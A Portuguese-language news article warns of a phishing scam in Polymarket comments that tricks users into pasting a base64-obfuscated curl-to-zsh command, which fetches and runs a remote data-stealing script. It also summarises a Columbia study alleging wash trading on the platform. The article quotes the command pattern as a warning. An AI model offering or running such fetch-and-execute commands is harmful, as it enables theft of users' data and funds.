Links de phishing em mercados privados da Polymarket: Usuários alertam para o problema

A Polymarket volta a ser notícia, desta vez porque um de seus traders seniores, com o pseudônimo "25usdc", alertou sobre um esquema que usa a seção de comentários da plataforma para enganar usuários desavisados. 

Isso está acontecendo em um momento crucial para a plataforma Polymarket, que está se preparando para retornar ao mercado americano e enfrenta dificuldades para superar rivais como a Kalshi. 

Operadores do Polymarket em alerta máximo 

Segundo o site 25usdc, hackers têm usado a seção de comentários do Polymarket para aplicar um golpe, e até o momento, os usuários perderam mais de US$ 500.000.

“Eles dizem: 'Por que você não negocia nos mercados privados da Polymarket? As probabilidades são sempre muito melhores lá!'”, escreveu 25usdc, antes de explicar como funciona todo o golpe. 

Segundo ele, tudo começa com a compra de ações tanto da opção "Sim" quanto da opção "Não" em um mercado, a partir de duas contas separadas. Dessa forma, os comentários permanecem visíveis mesmo com o filtro "Detentores" ativado. Em seguida, eles publicam o link do site de forma ofuscada.

A URL leva o usuário desavisado a uma página com aparência limpa, com o logotipo da Polymarket, e solicita o login do usuário por e-mail. Após a verificação do e-mail, uma nova janela é exibida, pedindo ao usuário que confirme sua atividade, imitando o CloudFlare. 

No entanto, 25usdc afirma que, ao clicar em "Copiar", um comando semelhante a este "curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh" é copiado e, caso o usuário cometa o erro de colá-lo no terminal, a primeira coisa que ele faz é decodificar a string codificada em base64 (um URL de servidor), após o que busca um script desse servidor e o executa imediatamente. 

O script em questão pode conter qualquer coisa e, segundo relatos, não haverá nenhum aviso pop-up, momento em que o dano já estará feito e a única solução, de acordo com 25usdc, poderá ser desligar o Wi-Fi. 

“No final, eles coletam dados, registram tudo no seu sistema e enviam um arquivo zip de volta para o servidor deles”, escreveu 25usdc. “Eles então usam esses dados para acessar suas contas e roubar seu dinheiro.”

Outro detalhe que ele observou foi a meticulosidade com que o grupo opera; por exemplo, eles apagam seus rastros trocando de carteiras digitais com frequência, usando artifícios de ocultação em todas as etapas e até mesmo desligando o servidor que envia os dados e recebe os registros quando não há nenhuma vítima ativa.

"Acho que a melhor maneira de lidar com isso é permitir que usuários confiáveis ​​revisem os comentários ou introduzir um sistema de votos negativos que oculte as postagens com muitos votos negativos", concluiu 25usdc, ressaltando que o simples aviso exibido atualmente pelo Polymarket não será suficiente. 

Aviso: Não existe nenhum site de "mercado privado" da Polymarket com "melhores probabilidades"

Nunca insira seu e-mail ou código de verificação de login do Polymarket em nenhum outro lugar que não seja nosso site oficial.

— Polymarket Traders (@PolymarketTrade) 9 de novembro de 2025

Um novo estudo afirma que o volume de negociações da Polymarket é sustentado por operações fictícias

Conforme Cryptopolitan relatado, um estudo publicado recentemente por pesquisadores da Universidade de Columbia afirma que o volume de atividade no Polymarket foi significativamente inflado por meio de negociações fictícias. 

A "negociação artificial", como os autores a denominaram, variou ao longo do tempo, mas eles afirmam que representou uma média de 25% de todas as compras e vendas no Polymarket nos últimos três anos. 

O artigo ainda não passou por revisão por pares, mas já está disponível na plataforma de pesquisa de acesso aberto SSRN e está sendo avaliado pela Polymarket. 

Para deixar claro, os autores não acusam diretamente a Polymarket de praticar wash trading. No entanto, eles destacaram elementos da estrutura da exchange baseada em criptomoedas que tornam a alegação plausível.  

Eles também sugeriram que os clientes da empresa podem ter se envolvidodentem tais negociações fictícias, numa tentativa de melhorar suas chances de obter acesso a um token digital proprietário que o fundador da empresa, Shayne Coplan, insinuou a possibilidade de lançar em 8 de outubro. 

“Tenho esperança de que a Polymarket acolha bem a análise do nosso artigo”, disse Yash Kanoria, professor da escola de negócios da Universidade de Columbia e um dos quatro coautores do artigo, em um e-mail. “A negociação fictícia não adiciona liquidez nem informação ao mercado, portanto, parece valioso distinguir o volume autêntico do inautêntico.”

Se parte do volume da Polymarket for realmente "fictício", o estudo afirma que isso poderia alterar a compreensão da força relativa da Polymarket no setor e também minar a noção atual de que os mercados de previsão refletem a "sabedoria de uma multidão maior"

“O potencial para negociações fictícias em larga escala significa que o volume pode não ser confiável como métrica de atividade autêntica da plataforma, especialmente em corretoras de criptomoedas que podem não ter salvaguardas adequadas”, concluíram os autores.